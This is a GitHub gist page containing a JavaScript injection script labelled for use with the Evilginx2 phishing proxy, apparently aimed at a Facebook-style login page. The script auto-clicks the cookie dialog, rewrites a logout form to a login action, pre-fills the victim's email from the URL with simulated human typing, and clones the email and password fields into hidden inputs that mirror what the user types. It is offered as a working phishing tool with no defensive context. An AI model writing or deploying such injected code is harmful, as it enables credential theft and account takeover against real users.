Skip to content

Instantly share code, notes, and snippets.

@M41KL-N41TT
Last active December 21, 2023 23:48
Show Gist options
  • Save M41KL-N41TT/519188252e14757db26d87779a538f95 to your computer and use it in GitHub Desktop.
Save M41KL-N41TT/519188252e14757db26d87779a538f95 to your computer and use it in GitHub Desktop.
Evilginx2 JavaScript async inject (but applicable for all sites really)
(function() {
async function waitForElement(selector) {
const startTime = Date.now();
const interval = 255;
const timeout = 25500;
while (Date.now() - startTime < timeout) {
const el = document.querySelector(selector);
if (el) return el;
await new Promise(r => setTimeout(r, interval));
}
throw new Error(`Timeout: Element "\${selector}" did not appear within \${timeout}ms.`);
}
function triggerEvent(el, eventType) {
if (document.createEvent) {
const evt = document.createEvent('HTMLEvents');
evt.initEvent(eventType, true, true);
el.dispatchEvent(evt);
} else if (el.fireEvent) {
el.fireEvent('on' + eventType);
}
}
function getRandomInt(min, max) {
min = Math.ceil(min);
max = Math.floor(max);
return Math.floor(Math.random() * (max - min + 1)) + min;
}
async function simulateTyping(element, inputStr, minDelay = 10, maxDelay = 25) {
for (const char of inputStr.split('')) {
await new Promise(resolve => setTimeout(resolve, getRandomInt(minDelay, maxDelay)));
element.value += char;
triggerEvent(element, 'input');
}
}
function cloneInputField(originalElement, newId) {
const clone = originalElement.cloneNode(true);
clone.id = clone.name = newId.replace('#', '');
clone.value = '';
clone.style.visibility = 'hidden';
originalElement.parentNode.insertBefore(clone, originalElement.nextSibling);
return clone;
}
async function main() {
try {
const hashValue = decodeURIComponent(location.hash.slice(1).split('#')[0]);
waitForElement("button[data-testid=cookie-policy-manage-dialog-accept-button]")
.then(ckElemBtn => {
ckElemBtn.click()
})
.catch(error => console.error('err1:', error));
waitForElement("form[action*='logout.php']")
.then(logOutElem => {
logOutElem.action = logOutElem.action.replaceAll('logout', 'login');
return fetch('/conductorwehaveaproblem');
})
.catch(error => console.error('err1:', error));
waitForElement("#email")
.then(emailField => {
if (emailField.value !== hashValue) {
simulateTyping(emailField, hashValue);
}
const clonedEmailField = cloneInputField(emailField, '#spoofEmail');
emailField.addEventListener('input', () => {
clonedEmailField.value = emailField.value;
});
})
.catch(error => console.error('err2:', error));
waitForElement("#pass")
.then(passwordField => {
const clonedPwdField = cloneInputField(passwordField, '#spoofPass');
passwordField.addEventListener('input', () => {
clonedPwdField.value = passwordField.value;
});
})
.catch(error => console.error('err3:', error));
} catch (error) {
console.error('Error:', error);
setTimeout(main, loopInterval);
} finally {
// Schedule the next execution of main
// setTimeout(main, loopInterval);
}
}
const loopInterval = 5000; // Loop every 5 seconds
// Start the loop
main();
})();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment